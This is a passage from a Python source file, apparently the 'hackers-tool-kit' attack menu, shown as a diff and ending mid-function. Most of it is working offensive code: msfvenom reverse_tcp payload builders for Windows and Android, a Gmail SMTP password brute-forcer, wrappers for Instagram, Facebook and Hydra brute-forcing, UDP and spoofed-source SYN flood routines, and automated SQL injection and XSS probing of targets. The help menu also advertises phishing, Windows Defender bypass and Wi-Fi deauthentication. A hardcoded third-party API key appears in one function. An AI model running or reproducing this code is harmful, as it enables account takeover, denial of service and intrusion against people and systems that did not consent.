╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - Created by @tuf_unkn0wn type ? for help - - """.decode('utf-8') -def mainbanner21(): - os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") - -def mainbanner22(): - print """{0} - - ██ ██ ██ ██ ███ - ██ ███ █████████ ███ ▄█ █▀ - ███ ███ ███ ███▐██▀ - ███▄▄▄▄███ ██{1} █████▀ - ██ ▀▀▀▀███ ███ ████▄ - ███ ███ ███ ███▐██▄ - ███ ██ ██ ██ ▀█ █▄ - {2} ███ ███ █ ███ ███ - - """.decode('utf-8').format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,22) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() - if num == 21: - mainbanner21() - if num == 22: - mainbanner22() - -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -reboot : reboot hackers-tool-kit -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -specscan: specific info gather on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] -htk-lite: run a lighter version of hackers-tool-kit -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" - k = raw_input("MODE> ") - ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#SPEC INFO SCAN START# -#--------------------# -def specscan(): - print """\033[1m -Scans Available:\033[0m - -1: simple nmap portscan - -2: show document info of target with curl - -3: nmap OS detection, version detection, script scanning, and traceroute scan - -4: nmap dns bruteforce - -5: get a hosts ip address - -6: check if a host is online - -7: who-is lookup - -8: dns-lookup - -9: get a hosts source code - -10: web application firewall scanner - -11: run a ssl scan - -12: find the location of a ip address - -13: reverse ip lookup - -14: host search - -15: reverse dns - -16: find shared dns - -17: cloudflare bypass - -18: sslscan - -19: directory scan / bruteforce - -20: nikto scan [this might take awhile to finish] - -go back: go back to main menu - - """ - print "Type a number then your target Ex: 5 www.pornhub.com\n" - j = False - while not j: - try: - option, target = raw_input("\033[1mScan:\033[0m ").split() - if option == "1": - os.system("nmap {0}".format(target)) - if option == "2": - os.system("curl -I {0}".format(target)) - if option == "3": - os.system("nmap -A {0}".format(target)) - if option == "4": - os.system("nmap --script dns-brute {0}".format(target)) - if option == "5": - ip = socket.gethostbyname(target) - print """ - Host: {0} - IP: {1} - """.format(target, ip) - if option == "6": - ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") - if ht == "https": - targetht = "https://" - if ht == "http": - targetht = "http://" - request = requests.get(targetht + target) - http = request.status_code - if http == 200: - print("\nServer: [\033[32monline\033[0m]") - else: - print("\nServer: [\033[31moffline\033[0m]") - if option == "7": - whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") - print(whois) - if option == "8": - os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) - if option == "9": - os.system("curl {0}".format(target)) - if option == "10": - os.system("wafw00f {0}".format(target)) - if option == "11": - os.system("sslscan {0}".format(target)) - if option == "12": - os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) - if option == "13": - os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) - if option == "14": - os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) - if option == "15": - os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) - if option == "16": - os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) - if option == "17": - def daf(): - subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", - "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", - "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", - "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", - "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", - "web", "dev"] - - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(target) - showip = socket.gethostbyname(str(hosts)) - print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) - except: - print "\033[0mBypassing..." - - daf() - if option == "18": - a = 'sslscan {0}'.format(target) - os.system(a) - if option == "19": - ht = raw_input("HTTP or HTTPS: ") - if ht == "https": - targetht = "https://" - if ht == "http": - targetht = "http://" - a = 'dirb {0}{1}/'.format(targetht,target) - os.system(a) - if option == "20": - port = raw_input("\033[1mPort:\033[0m ") - os.system("nikto -h {0} -p {1}".format(target,port)) - if target == "back": - break - except: - print "\n" - break - j = True -#------------------# -#SPEC INFO SCAN END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - 